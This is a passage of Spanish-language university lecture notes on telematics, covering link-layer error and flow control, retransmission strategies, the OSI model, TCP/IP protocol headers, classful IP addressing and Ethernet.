Método Indirecto:
Primero si detecta la presencia de errores por medio de un código y luego se pide la retransmisión del
bloque afectado. Los códigos empleados para este fin son:
Códigos de paridad longitudinal y transversal
Códigos capaces de corregir errores en el método ―directo‖ (Geométricos, matriciales, cíclicos
basados en Campos de GALOIS, etc).
Códigos de redundancia cíclica basados en la división de polinomios con coeficientes binarios.

Una vez detectado en bloque erróneo, automáticamente se pide su retransmisión, razón por la cual el
método se denomina Automatic Repeat Request (ARQ) método preferentemente usado en telemática.
En cuanto al control de secuencias, algunos protocolos numeran y verifican los segmentos o tramas de
datos para garantizar la detección los segmentos perdidos.

Control de Flujo
Los receptores tienen que ser capaces de regular el flujo de información por ser recibidos con el fin de
prevenir un posible exceso de datos, que superado en su capacidad, no podría ser recibido. Esta misión
está a cargo de la función de control que reside en el nivel ED.
En la comunicación de datos ocurre que el ritmo de generación de información de datos por un
remitente es mucho mayor que el consumo del destinatario. Ejemplo Computador-Impresora, razón por
la cual es preciso contener la fuente de información, lo que equivale al control de flujo. Para la
contención existen tres estrategias:
BUSY (Ocupado): En una Interfaz en paralelo el problema se resuelve por medio de una línea ad hoc
del tipo Ocupado (BUSY). En una comunicación en serie se emplean mensajes especializados, que dan
origen a las siguientes soluciones:
Frenado Brusco: Cuando un destinatario no puede seguir recibiendo información en forma
momentánea, éste envía a su corresponsal una secuencia de control tal como WACK (Wait alter
ACK) seguida por la trama RNR (Receiver Not Ready), como es el caso de los protocolos
orientados al bit y al caracter.
Interrupción de Inversión (Reverse interrup): Es utilizada en los protocolos orientados al caracter,
que se identifica con la secuencia de control RINT, formada por el par de caracteres DLE. Esta

____________________________________________________________________________________________________________________
UNdeC Página 25
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

secuencia es enviada por el destinatario en lugar de una confirmación, para solicitar el FIN
PREAMBULO de la transferencia de datos en curso e iniciar una nueva fase en la cual los
papeles del destinatario y de remitente se invierten. Esta interrupción facilita el envío de
mensajes urgentes.
Ventana deslizante o ventana de crédito: Es empleada en las estrategias de retransmisión en el
caso de envío continuo de mensajes. En forma breve: El receptor no necesita enviar la
confirmación ACK inmediatamente después de cada trama. Se denomina ventana deslizante al
número máximo de tramas que en un determinado momento pueden estar pendientes de
confirmación. Un remitente no puede desbordar a un destinatario sin su consentimiento. La
cadencia del consumidor se adapta a la del generador, puesto que si éste es más lento o se
encuentra muy atareado, tardará en devolver la confirmación de las tramas pendientes,
conteniendo así suavemente al generador. Es de observar, que cada confirmación constituye un
crédito para recibir otra trama. Las tramas son además numeradas para asegurar la confiabilidad
del sistema. Para acomodar las tramas pendientes de confirmación, el receptor tiene que tener
un buffer ad hoc.

Recuperación de Fallas
Esta función incluye procesos requeridos para detectar y recuperarse de situaciones anormales, tales
como perdida de respuesta, secuencia inválidas, enlaces cortados perdida del caracter del fin de la
trama. Los mecanismos básicos utilizados para recuperación de fallas son:
Tiempo de expiración (timeout), que consiste en establecer los plazos máximos de tiempo de
espera.
Solicitud de una nueva respuesta, si el plazo ya está vencido.
Limitación del número de reintentos transcurridos, cuya falla se da por irrecuperable (desde el
punto del vista del enlace), comunicándose tal circunstancia al nivel de red para que tome las
medidas oportunas. Al no limitar el número de reintentos se corre el peligro de entrar en un ciclo
indefinido de solicitudes y respuestas, por ejemplo si un terminal se encuentra fuera de
funcionamiento.

Terminación de la Comunicación
Una vez terminada la transferencia de la información del usuario, se procede a terminar el enlace que
ha sido lógicamente establecido al principio por medio del proceso de la inicialización. La función de
terminación involucra la suspensión del enlace, asegurándose primero, que todos los datos enviados
han sido efectivamente recibidos. Una vez terminada esta etapa previa se procede a remover el enlace
lógico, cosa que no necesariamente significa la desconexión del camino físico.

Gestión de Enlace
La función de gestión de enlace sirve de interfaz entre el enlace de datos y el entorno OSI. Esta función
incluye tanto la activación como la des-activación de las funciones de la capa, como así mismo de los
proceso de monitoreo y estadísticas.

Estrategias de Retransmisión
Las funciones de control de flujo, de errores y de secuencias como así mismo la recuperación de fallas,
normalmente recurren a la retransmisión de los bloques afectados, para asegurar de esta manera la
confiabilidad de la comunicación.

Los Mensajes de reconocimiento (o acuse)


El receptor informa al transmisor sobre las tramas recibidas por medio de los mensajes de
reconocimiento positivo (ACK) o negativo (NACK) enviado en una trama de retorno (―Piggybacked
Acknowledgment‖, porque el reconocimiento esta montado sobre una trama de retorno). De esta
manera el transmisor sabe con precisión que tramas tendrá que retransmitir.

Parada y espera
Al enviar una trama el remitente guarda una copia deteniendo la transmisión hasta que llegue su
reconocimiento. Si la transmisión es correcta, el destinatario devuelve un mensaje con una
confirmación positiva (ACK) y el remitente al recibirlo, libera la memoria ocupada por la copia. En
cambio, si el destinatario detecta que la trama es errónea, devuelve un mensaje de rechazo (NACK),
que el remitente interpreta como solicitud de retransmisión.

____________________________________________________________________________________________________________________
UNdeC Página 26
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Envío Continuo
En la estrategia de envío continuo se envían los bloques sin paradas intermedias entre ellos (salvo que
el remitente tenga más que transmitir), estando autorizado a tener múltiples tramas sin confirmación en
forma simultánea De esta el transmisor mantiene una ventana de mensajes por transmitir moviéndola
hacia adelante con los envíos y el reconocimiento. Llegando el reconocimiento positivo (ACK) por el
canal de retorno la transmisión sigue su marcha normal, siguiendo con forma secuencial con las tramas
numeradas. Es de observar que este método exige un canal duplex. Para los casos de rechazos existen
dos modalidades de retransmisión:
Rechazo no selectivo: Es esta caso el transmisor retransmite la trama rechazada y todos los
siguientes que había ya transmitido antes de la recepción del rechazo.
Rechazo selectivo: El transmisor procede a retransmitir exclusivamente la trama rechazada, sin
repetir las demás. Esta modalidad es más eficiente pero requiere controladores más complejos.

____________________________________________________________________________________________________________________
UNdeC Página 27
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

3. TRANSMICION DE DATOS
3.1. Introducción
La gran rapidez con la que Internet se ha expandido y popularizado en los últimos años ha supuesto una
revolución muy importante en el mundo de las comunicaciones, llegando a causar cambios en muchos
aspectos de la sociedad. Lo que se conoce hoy como Internet es en realidad un conjunto de redes
independientes (de área local y área extensa) que se encuentran conectadas entre si, permitiendo el
intercambio de datos y constituyendo por lo tanto una red mundial que resulta el medio idóneo para el
intercambio de información, distribución de datos de todo tipo e interacción personal con otras personas.

3.2. Transmisión De Datos En Internet


Una red de ordenadores permite conectar a los ordenadores que la forman con la finalidad de compartir
información, como documentos o bases de datos, o recursos físicos, como impresoras o unidades de
disco. Las redes suelen clasificarse según su extensión en:

LAN (Local Area Network): Son las redes de área local. La extensión de este tipo de redes suele
estar restringida a una sala edificio, aunque también podría utilizarse para conectar dos más edificios
próximos.
WAN (Wide Area Network): Son redes que cubren un espacio muy amplio, conectando a
ordenadores de una cuidad o un país completo. Para ello se utilizan las líneas de teléfono y otros
medios de transmisión más sofisticados, como pueden ser las microondas. La velocidad de
transmisión suele ser inferior que en las redes locales.

Varias redes pueden conectarse entre S formando una red lógica de área mayor. Para que la
transmisión entre todas ellas sea posible se emplean los routers, que son los sistemas que
conectando físicamente varias redes se encargan de dirigir la información por el camino
adecuado. Cuando las redes que se conectan son de diferente tipo y con protocolos distintos se
hace necesario el uso de los gateways, los cuales además de encaminar la información también
son capaces de convertir los datos de un protocolo a otro. Generalmente los términos router y
gateway se emplean indistintamente para referirse de forma general a los sistemas encargados
del encaminamiento de datos en Internet.

Lo que se conoce como Internet es en realidad una red de redes, la interconexión de otras redes
independientes de manera que puedan compartir información entre ellas a lo largo de todo el planeta.
Para ello es necesario el uso de un protocolo de comunicaciones común. El protocolo que proporciona la
compatibilidad necesaria para la comunicación en Internet es el TCP/IP.

Los protocolos de comunicaciones definen las normas que posibilitan que se establezca una
comunicación entre varios equipos o dispositivos, ya que estos equipos pueden ser diferentes entre S.

Un interfaz, sin embargo, es el encargado de la conexión física entre los equipos, definiendo las normas
para las características eléctricas y mecánicas de la conexión.

Exceptuando a los routers cualquier ordenador conectado a Internet y, por tanto, capaz de compartir
información con otro ordenador se conoce con el nombre de host (anfitrión). Un host debe identificarse
de alguna manera que lo distinga de los demás para poder recibir o enviar datos. Para ello todos los
ordenadores conectados a Internet disponen de una dirección única y exclusiva. Esta dirección, conocida
como dirección de Internet o dirección IP, es un número de 32 bit que generalmente se representa en
cuatro grupos de 8 bit cada uno separados por puntos y en base decimal (esto es así en la versión
número 4 del protocolo IP, pero no en la 6). Un ejemplo de dirección IP es el siguiente: 205.198.48.1.

____________________________________________________________________________________________________________________
UNdeC Página 28
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

3.3. El Modelo OSI


El modelo OSI (Open System Interconection) es utilizado por prácticamente la totalidad de las redes del
mundo. Este modelo fue creado por el ISO (Organización Internacional de Normalización), y consiste en
siete niveles o capas donde cada una de ellas define las funciones que deben proporcionar los
protocolos con el propósito de intercambiar información entre varios sistemas. Esta clasificación permite
que cada protocolo se desarrolle con una finalidad determinada, lo cual simplifica el proceso de
desarrollo e implementación. Cada nivel depende de los que están por debajo de él, y a su vez
proporciona alguna funcionalidad a los niveles superiores.

Los siete niveles del modelo OSI son los siguientes:

Aplicación El nivel de aplicación es el destino final de los datos donde se proporcionan los servicios al usuario.

Presentación Se convierten e interpretan los datos que se utilizarán en el nivel de aplicación.

Sesión Encargado de ciertos aspectos de la comunicación como el control de los tiempos.

Transporte Transporta la información de una manera fiable para que llegue correctamente a su destino.

Red Nivel encargado de encaminar los datos hacia su destino eligiendo la ruta más efectiva.

Enlace Enlace de datos. Controla el flujo de los mismos, la sincronización y los errores que puedan producirse.

Físico Se encarga de los aspectos físicos de la conexión, tales como el medio de transmisión o el hardware.

3.4. Arquitectura Cliente-Servidor.


La arquitectura cliente-servidor es una forma específica de diseño de aplicaciones, aunque también se
conoce con este nombre a los ordenadores en los que se estas aplicaciones son ejecutadas. Por un
lado, el cliente es el ordenador que se encarga de efectuar una petición o solicitar un servicio. El cliente
no posee control sobre los recursos, sino que es el servidor el encargado de manejarlos. Por otro lado, el
ordenador remoto que actúa como servidor evalúa la petición del cliente y decide aceptarla o rechazarla
consecuentemente. Una vez que el servidor acepta el pedido la información requerida es suministrada al
cliente que efectuó la petición, siendo este último el responsable de proporcionar los datos al usuario con
el formato adecuado. Finalmente debemos precisar que cliente y servidor no tienen que estar
necesariamente en ordenadores separados, sino que pueden ser programas diferentes que se ejecuten
en el mismo ordenador.

3.5. El protocolo TCP/IP.


TCP/IP es el protocolo común utilizado por todos los ordenadores conectados a Internet, de manera que
éstos puedan comunicarse entre S. Hay que tener en cuenta que en Internet se encuentran conectados
ordenadores de clases muy diferentes y con hardware y software incompatibles en muchos casos,
además de todos los medios y formas posibles de conexión. Aquí se encuentra una de las grandes
ventajas del TCP/IP, pues este protocolo se encargará de que la comunicación entre todos sea posible.
TCP/IP es compatible con cualquier sistema operativo y con cualquier tipo de hardware.

TCP/IP no es un único protocolo, sino que es en realidad lo que se conoce con este nombre es un
conjunto de protocolos que cubren los distintos niveles del modelo OSI. Los dos protocolos más
importantes son el TCP (Transmission Control Protocol) y el IP (Internet Protocol), que son los que dan
nombre al conjunto. En Internet se diferencian cuatro niveles o capas en las que se agrupan los
protocolos, y que se relacionan con los niveles OSI de la siguiente manera:

Aplicación: Se corresponde con los niveles OSI de aplicación, presentación y sesión. Aquí se
incluyen protocolos destinados a proporcionar servicios, tales como correo electrónico (SMTP),

____________________________________________________________________________________________________________________
UNdeC Página 29
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

transferencia de ficheros (FTP), conexión remota (TELNET) y otros más recientes como el protocolo
HTTP (Hypertext Transfer Protocol).
Transporte: Coincide con el nivel de transporte del modelo OSI. Los protocolos de este nivel, tales
como TCP y UDP, se encargan de manejar los datos y proporcionar la fiabilidad necesaria en el
transporte de los mismos.
ternet: Es el nivel de red del modelo OSI. Incluye al protocolo IP, que se encarga de enviar los
paquetes de información a sus destinos correspondientes. Es utilizado con esta finalidad por los
protocolos del nivel de transporte.
Enlace: Los niveles OSI correspondientes son el de enlace y el nivel físico. Los protocolos que
pertenecen a este nivel son los encargados de la transmisión a través del medio físico al que se
encuentra conectado cada host, como puede ser una línea punto a punto o una red Ethernet.

El TCP/IP necesita funcionar sobre algún tipo de red o de medio físico que proporcione sus propios
protocolos para el nivel de enlace de Internet. Por este motivo hay que tener en cuenta que los
protocolos utilizados en este nivel pueden ser muy diversos y no forman parte del conjunto TCP/IP. Sin
embargo, esto no debe ser problemático puesto que una de las funciones y ventajas principales del
TCP/IP es proporcionar una abstracción del medio de forma que sea posible el intercambio de
información entre medios diferentes y tecnologías que inicialmente son incompatibles.

Para transmitir información a través de TCP/IP, ésta debe ser dividida en unidades de menor tamaño.
Esto proporciona grandes ventajas en el manejo de los datos que se transfieren y, por otro lado, esto es
algo común en cualquier protocolo de comunicaciones. En TCP/IP cada una de estas unidades de
información recibe el nombre de "datagrama" (datagram), y son conjuntos de datos que se envían como
mensajes independientes.

3.6. TCP (Transmission Control Protocol)


El protocolo de control de transmisión (TCP) pertenece al nivel de transporte, siendo el encargado de
dividir el mensaje original en datagramas de menor tamaño, y por lo tanto, mucho más manejables. Los
datagramas serán dirigidos a través del protocolo IP de forma individual. El protocolo TCP se encarga
además de añadir cierta información necesaria a cada uno de los datagramas. Esta información se
añade al inicio de los datos que componen el datagrama en forma de cabecera.

La cabecera de un datagrama contiene al menos 160 bit que se encuentran repartidos en varios campos
con diferente significado. Cuando la información se divide en datagramas para ser enviados, el orden en
que éstos lleguen a su destino no tiene que ser el correcto. Cada uno de ellos puede llegar en cualquier
momento y con cualquier orden, e incluso puede que algunos no lleguen a su destino o lleguen con
información errónea. Para evitar todos estos problemas el TCP numera los datagramas antes de ser
enviados, de manera que sea posible volver a unirlos en el orden adecuado. Esto permite también
solicitar de nuevo el envío de los datagramas individuales que no hayan llegado o que contengan
errores, sin que sea necesario volver a enviar el mensaje completo.

____________________________________________________________________________________________________________________
UNdeC Página 30
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Formato de la cabecera TCP.

Puerto origen

Puerto destino

Número de secuencia

Señales de confirmación

Tamaño

Reservado

Bits de control

Window

Checksum

Puntero a datos urgentes

En cualquier caso el tamaño de la cabecera debe ser múltiplo de 32 bits, por lo que puede ser necesario
añadir un campo de tamaño variable y que contenga ceros al final para conseguir este objetivo cuando
se incluyen algunas opciones. El campo de tamaño contiene la longitud total de la cabecera TCP
expresada en el número de palabras de 32 bits que ocupa. Esto permite determinar el lugar donde
comienzan los datos.

Dos campos incluidos en la cabecera y que son de especial importancia son los números de puerto de
origen y puerto de destino. Los puertos proporcionan una manera de distinguir entre las distintas
transferencias, ya que un mismo ordenador puede estar utilizando varios servicios o transferencias
simultáneamente, e incluso puede que por medio de usuarios distintos. El puerto de origen contendrá un
número cualquiera que sirva para realizar esta distinción. Además, el programa cliente que realiza la
petición también se debe conocer el número de puerto en el que se encuentra el servidor adecuado.
Mientras que el programa del usuario utiliza números prácticamente aleatorios, el servidor deber tener
asignado un número estándar para que pueda ser utilizado por el cliente. (Por ejemplo, en el caso de la
transferencia de ficheros FTP el número oficial es el 21). Cuando es el servidor el que envía los datos,
los números de puertos de origen y destino se intercambian.

En la transmisión de datos a través del protocolo TCP la fiabilidad es un factor muy importante. Para
poder detectar los errores y pérdida de información en los datagramas, es necesario que el cliente envíe
de nuevo al servidor unas señales de confirmación una vez que se ha recibido y comprobado la
información satisfactoriamente. Estas señales se incluyen en el campo apropiado de la cabecera del
datagrama (Acknowledgment Number), que tiene un tamaño de 32 bit. Si el servidor no obtiene la señal
de confirmación adecuada transcurrido un período de tiempo razonable, el datagrama completo se
volverá a enviar. Por razones de eficiencia los datagramas se envían continuamente sin esperar la
confirmación, haciéndose necesaria la numeración de los mismos para que puedan ser ensamblados en
el orden correcto.

También puede ocurrir que la información del datagrama llegue con errores a su destino. Para poder
detectar cuando sucede esto se incluye en la cabecera un campo de 16 bit, el cual contiene un valor
calculado a partir de la información del datagrama completo (checksum). En el otro extremo el receptor
vuelve a calcular este valor, comprobando que es el mismo que el suministrado en la cabecera. Si el
valor es distinto significaría que el datagrama es incorrecto, ya que en la cabecera o en la parte de datos
del mismo hay algún error.

____________________________________________________________________________________________________________________
UNdeC Página 31
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

La forma en que TCP numera los datagramas es contando los bytes de datos que contiene cada uno de
ellos y añadiendo esta información al campo correspondiente de la cabecera del datagrama siguiente.
De esta manera el primero empezará por cero, el segundo contendrá un número que será igual al
tamaño en bytes de la parte de datos del datagrama anterior, el tercero con la suma de los dos
anteriores, y así sucesivamente. Por ejemplo, para un tamaño fijo de 500 bytes de datos en cada
datagrama, la numeración sería la siguiente: 0 para el primero, 500 para el segundo, 1000 para el
tercero, etc.

Existe otro factor más a tener en cuenta durante la transmisión de información, y es la potencia y
velocidad con que cada uno de los ordenadores puede procesar los datos que le son enviados. Si esto
no se tuviera en cuenta, el ordenador de más potencia podría enviar la información demasiado rápido al
receptor, de manera que éste no pueda procesarla. Este inconveniente se soluciona mediante un campo
de 16 bit (Window) en la cabecera TCP, en el cual se introduce un valor indicando la cantidad de
información que el receptor está preparado para procesar. Si el valor llega a cero será necesario que el
emisor se detenga. A medida que la información es procesada este valor aumenta indicando
disponibilidad para continuar la recepción de datos.

Protocolos alternativos a TCP.

TCP es el protocolo más utilizado para el nivel de transporte en Internet, pero además de éste existen
otros protocolos que pueden ser más convenientes en determinadas ocasiones. Tal es el caso de UDP y
ICMP.

3.7. UDP (User Datagram Protocol)


El protocolo de datagramas de usuario (UDP) puede ser la alternativa al TCP en algunos casos en los
que no sea necesario el gran nivel de complejidad proporcionado por el TCP. Puesto que UDP no admite
numeración de los datagramas, éste protocolo se utiliza principalmente cuando el orden en que se
reciben los mismos no es un factor fundamental, o también cuando se quiere enviar información de poco
tamaño que cabe en un único datagrama.

Cuando se utiliza UDP la garantía de que un paquete llegue a su destino es mucho menor que con TCP
debido a que no se utilizan las señales de confirmación. Por todas estas características la cabecera del
UDP es bastante menor en tamaño que la de TCP. Esta simplificación resulta en una mayor eficiencia en
determinadas ocasiones.

Un ejemplo típico de una situación en la que se utiliza el UDP es cuando se pretende conectar con un
ordenador de la red, utilizando para ello el nombre del sistema. Este nombre tendrá que ser convertido a
la dirección IP que le corresponde y, por tanto, tendrá que ser enviado a algún servidor que posea la
base de datos necesaria para efectuar la conversión. En este caso es mucho más conveniente el uso de
UDP.

3.8. ICMP (Internet Control Message Protocol)


El protocolo de mensajes de control de Internet (ICMP) es de características similares al UDP, pero con
un formato aún más simple. Su utilidad no está en el transporte de datos "de usuario", sino en los
mensajes de error y de control necesarios para los sistemas de la red.

3.9. IP (Internet Protocol)


El IP es un protocolo que pertenece al nivel de red, por lo tanto, es utilizado por los protocolos del nivel
de transporte como TCP para encaminar los datos hacia su destino. IP tiene únicamente la misión de
encaminar el datagrama, sin comprobar la integridad de la información que contiene. Para ello se utiliza
una nueva cabecera que se antepone al datagrama que se está tratando. Suponiendo que el protocolo

____________________________________________________________________________________________________________________
UNdeC Página 32
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

TCP ha sido el encargado de manejar el datagrama antes de pasarlo al IP, la estructura del mensaje una
vez tratado quedaría así:

Cabecera IP Cabecera TCP


Datos
(20 byte) (20 byte)

La cabecera IP tiene un tamaño de 160 bit y está formada por varios campos de distinto significado.
Estos campos son:

Versión: Número de versión del protocolo IP utilizado. Tendrá que tener el valor 4. Tamaño: 4 bit.
Longitud de la cabecera: (Internet Header Length, IHL) Especifica la longitud de la cabecera
expresada en el número de grupos de 32 bit que contiene. Tamaño: 4 bit.
Tipo de servicio: El tipo o calidad de servicio se utiliza para indicar la prioridad o importancia de los
datos que se envían, lo que condicionará la forma en que éstos serán tratados durante la
transmisión. Tamaño: 8 bit.
Longitud total: Es la longitud en bytes del datagrama completo, incluyendo la cabecera y los datos.
Como este campo utiliza 16 bit, el tamaño máximo del datagrama no podrá superar los 65.535 bytes,
aunque en la práctica este valor será mucho más pequeño. Tamaño: 16 bit.
Identificación: Valor de identificación que se utiliza para facilitar el ensamblaje de los fragmentos del
datagrama. Tamaño: 16 bit.
Flags: Indicadores utilizados en la fragmentación. Tamaño: 3 bit.
Fragmentación: Contiene un valor (offset) para poder ensamblar los datagramas que se hayan
fragmentado. Está expresado en número de grupos de 8 bytes (64 bit), comenzando con el valor
cero para el primer fragmento. Tamaño: 16 bit.
Límite de existencia: Contiene un número que disminuye cada vez que el paquete pasa por un
sistema. Si este número llega a cero, el paquete será descartado. Esto es necesario por razones de
seguridad para evitar un bucle infinito, ya que aunque es bastante improbable que esto suceda en
una red correctamente diseñada, no debe descuidarse esta posibilidad. Tamaño: 8 bit.
Protocolo: El número utilizado en este campo sirve para indicar a qué protocolo pertenece el
datagrama que se encuentra a continuación de la cabecera IP, de manera que pueda ser tratado
correctamente cuando llegue a su destino. Tamaño: 8 bit.
Comprobación: El campo de comprobación (checksum) es necesario para verificar que los datos
contenidos en la cabecera IP son correctos. Por razones de eficiencia este campo no puede
utilizarse para comprobar los datos incluidos a continuación, sino que estos datos de usuario se
comprobarán posteriormente a partir del campo de comprobación de la cabecera siguiente, y que
corresponde al nivel de transporte. Este campo debe calcularse de nuevo cuando cambia alguna
opción de la cabecera, como puede ser el límite de existencia. Tamaño: 16 bit.
Dirección de origen: Contiene la dirección del host que envía el paquete. Tamaño: 32 bit.
Dirección de destino: Esta dirección es la del host que recibirá la información. Los routers o gateways
intermedios deben conocerla para dirigir correctamente el paquete. Tamaño: 32 bit.

3.10. La dirección de Internet.


El protocolo IP identifica a cada ordenador que se encuentre conectado a la red mediante su
correspondiente dirección. Esta dirección es un número de 32 bit que debe ser único para cada host, y
normalmente suele representarse como cuatro cifras de 8 bit separadas por puntos.

La dirección de Internet (IP Address) se utiliza para identificar tanto al ordenador en concreto como la red
a la que pertenece, de manera que sea posible distinguir a los ordenadores que se encuentran
conectados a una misma red. Con este propósito, y teniendo en cuenta que en Internet se encuentran
conectadas redes de tamaños muy diversos, se establecieron tres clases diferentes de direcciones, las
cuales se representan mediante tres rangos de valores:

____________________________________________________________________________________________________________________
UNdeC Página 33
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

Clase A: Son las que en su primer byte tienen un valor comprendido entre 1 y 126, incluyendo
ambos valores. Estas direcciones utilizan únicamente este primer byte para identificar la red,
quedando los otros tres bytes disponibles para cada uno de los hosts que pertenezcan a esta misma
red. Esto significa que podrán existir más de dieciséis millones de ordenadores en cada una de las
redes de esta clase. Este tipo de direcciones es usado por redes muy extensas, pero hay que tener
en cuenta que sólo puede haber 126 redes de este tamaño. ARPAnet es una de ellas, existiendo
además algunas grandes redes comerciales, aunque son pocas las organizaciones que obtienen una
dirección de "clase A". Lo normal para las grandes organizaciones es que utilicen una o varias redes
de "clase B".
Clase B: Estas direcciones utilizan en su primer byte un valor comprendido entre 128 y 191,
incluyendo ambos. En este caso el identificador de la red se obtiene de los dos primeros bytes de la
dirección, teniendo que ser un valor entre 128.1 y 191.254 (no es posible utilizar los valores 0 y 255
por tener un significado especial). Los dos últimos bytes de la dirección constituyen el identificador
del host permitiendo, por consiguiente, un número máximo de 64516 ordenadores en la misma red.
Este tipo de direcciones tendría que ser suficiente para la gran mayoría de las organizaciones
grandes. En caso de que el número de ordenadores que se necesita conectar fuese mayor, sería
posible obtener más de una dirección de "clase B", evitando de esta forma el uso de una de "clase
A".
Clase C: En este caso el valor del primer byte tendrá que estar comprendido entre 192 y 223,
incluyendo ambos valores. Este tercer tipo de direcciones utiliza los tres primeros bytes para el
número de la red, con un rango desde 192.1.1 hasta 223.254.254. De esta manera queda libre un
byte para el host, lo que permite que se conecten un máximo de 254 ordenadores en cada red. Estas
direcciones permiten un menor número de host que las anteriores, aunque son las más numerosas
pudiendo existir un gran número redes de este tipo (más de dos millones).

Tabla de direcciones IP de Internet.

Clase Primer byte Identificación de red Identificación de hosts Número de redes Número de hosts

A 1 .. 126 1 byte 3 byte 126 16.387.064

B 128 .. 191 2 byte 2 byte 16.256 64.516

C 192 .. 223 3 byte 1 byte 2.064.512 254

En la clasificación de direcciones anterior se puede notar que ciertos números no se usan. Algunos de
ellos se encuentran reservados para un posible uso futuro, como es el caso de las direcciones cuyo
primer byte sea superior a 223 (clases D y E, que aún no están definidas), mientras que el valor 127 en
el primer byte se utiliza en algunos sistemas para propósitos especiales. También es importante notar
que los valores 0 y 255 en cualquier byte de la dirección no pueden usarse normalmente por tener otros
propósitos específicos. El número 0 está reservado para las máquinas que no conocen su dirección,
pudiendo utilizarse tanto en la identificación de red para máquinas que aún no conocen el número de red
a la que se encuentran conectadas, en la identificación de host para máquinas que aún no conocen su
número de host dentro de la red, o en ambos casos.

El número 255 tiene también un significado especial, puesto que se reserva para el broadcast. El
broadcast es necesario cuando se pretende hacer que un mensaje sea visible para todos los sistemas
conectados a la misma red. Esto puede ser útil si se necesita enviar el mismo datagrama a un número
determinado de sistemas, resultando más eficiente que enviar la misma información solicitada de manera
individual a cada uno. Otra situación para el uso de broadcast es cuando se quiere convertir el nombre
____________________________________________________________________________________________________________________
UNdeC Página 34
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

por dominio de un ordenador a su correspondiente número IP y no se conoce la dirección del servidor de


nombres de dominio más cercano.

Lo usual es que cuando se quiere hacer uso del broadcast se utilice una dirección compuesta por el
identificador normal de la red y por el número 255 (todo unos en binario) en cada byte que identifique al
host. Sin embargo, por conveniencia también se permite el uso del número 255.255.255.255 con la
misma finalidad, de forma que resulte más simple referirse a todos los sistemas de la red.

El broadcast es una característica que se encuentra implementada de formas diferentes dependiendo del
medio utilizado, y por lo tanto, no siempre se encuentra disponible. En ARPAnet y en las líneas punto a
punto no es posible enviar broadcast, pero sí que es posible hacerlo en las redes Ethernet, donde se
supone que todos los ordenadores prestarán atención a este tipo de mensajes.

En el caso de algunas organizaciones extensas puede surgir la necesidad de dividir la red en otras redes
más pequeñas (subnets). Como ejemplo podemos suponer una red de clase B que, naturalmente, tiene
asignado como identificador de red un número de dos bytes. En este caso sería posible utilizar el tercer
byte para indicar en qué red Ethernet se encuentra un host en concreto. Esta división no tendrá ningún
significado para cualquier otro ordenador que esté conectado a una red perteneciente a otra
organización, puesto que el tercer byte no será comprobado ni tratado de forma especial. Sin embargo,
en el interior de esta red existirá una división y será necesario disponer de un software de red
especialmente diseñado para ello. De esta forma queda oculta la organización interior de la red, siendo
mucho más cómodo el acceso que si se tratara de varias direcciones de clase C independientes.

3.11. Niveles Físico y de Enlace:


Ethernet

Los protocolos que pertenecen al nivel de enlace o interfaz de red de Internet (niveles físico y de enlace
en el modelo OSI) deben añadir más información a los datos provenientes de IP para que la transmisión
pueda realizarse. Es el caso, por ejemplo, de las redes Ethernet, de uso muy extendido actualmente.
Este tipo de redes utiliza su propio sistema de direcciones, junto con una nueva cabecera para los datos.

Las redes locales Ethernet son posiblemente la tecnología que domina en Internet. Este tipo de redes fue
desarrollado por Xerox durante los años 70, y entre sus características podemos destacar su alto nivel
de rendimiento, la utilización de cable coaxial para la transmisión, una velocidad de 10Mbit/seg. y
CSMA/CD como técnica de acceso.

Ethernet es un medio en el que todos los ordenadores pueden acceder a cada uno de los paquetes que
se envían, aunque un ordenador sólo tendrá que prestar atención a aquellos que van dirigidos a él
mismo.

La técnica de acceso CSMA/CD (Carrier Sense and Multiple Access with Collition Detection) permite a
que todos los dispositivos puedan comunicarse en el mismo medio, aunque sólo puede existir un único
emisor en cada instante. De esta manera todos los sistemas pueden ser receptores de forma simultánea,
pero la información tiene que ser transmitida por turnos. Si varios dispositivos intentan transmitir en el
mismo instante la colisión es detectada, de forma que cada uno de ellos volverá a intentar la transmisión
transcurrido un pequeño intervalo de tiempo aleatorio.

Es importante notar que las direcciones utilizadas por Ethernet no guardan ninguna relación con las
direcciones de Internet. Así como las direcciones IP de Internet son asignadas por el usuario, las
direcciones Ethernet se asignan "de fábrica". Esta es la razón por la que se utilizan 48 bit en las
direcciones, ya que de esta manera se obtiene un número lo suficientemente elevado de direcciones
como para asegurar que no sea necesario repetir los valores.

En una red Ethernet los paquetes son transportados de un ordenador a otro de manera que son visibles
para todos, siendo necesario un procedimiento para identificar los paquetes que pertenecen a cada
ordenador. Cuando el paquete es recibido en el otro extremo, la cabecera y el checksum se retiran, se
____________________________________________________________________________________________________________________
UNdeC Página 35
CATEDRA Profesor
Telemática Ing. Alexis Wol
_______________________________________________________________________________

comprueba que los datos corresponden a un mensaje IP, y este mensaje se pasa al protocolo IP para
que sea procesado.

El tamaño máximo para un paquete de datos varía de unas redes a otras. En el caso de Ethernet el
tamaño puede ser de 1500 bytes, para otras redes puede ser menor o bastante mayor en el caso de
redes muy rápidas. Aquí surge otro problema, pues normalmente los paquetes de tamaño mayor resultan
más eficientes para transmitir grandes cantidades de información. Sin embargo, se debe tener en cuenta
que las redes del receptor y el emisor pueden ser muy distintas. Por este motivo el protocolo TCP está
preparado para negociar el tamaño máximo de los datagramas que serán enviados durante el resto de la
conexión. Pero así el problema no queda completamente resuelto porque hasta que los paquetes lleguen
a su destino es muy probable que tengan que atravesar otras redes intermedias, las cuales puede que
no sean capaces de soportar el tamaño de los paquetes que se está enviando. Se hace necesario
entonces dividir el paquete original en otros más pequeños para que puedan ser manejados: Esto se
conoce como fragmentación (fragmentation).

La fragmentación es posible gracias a determinados campos que el protocolo IP introduce en su


cabecera. Estos campos de fragmentación se usan cuando ha sido necesario dividir el paquete enviado
originalmente, de manera que éste pueda ser reconstruido por el host receptor a través del protocolo
TCP/IP. Este último proceso de reconstrucción de los paquetes se conoce como "reensamblaje"
(reassembly).
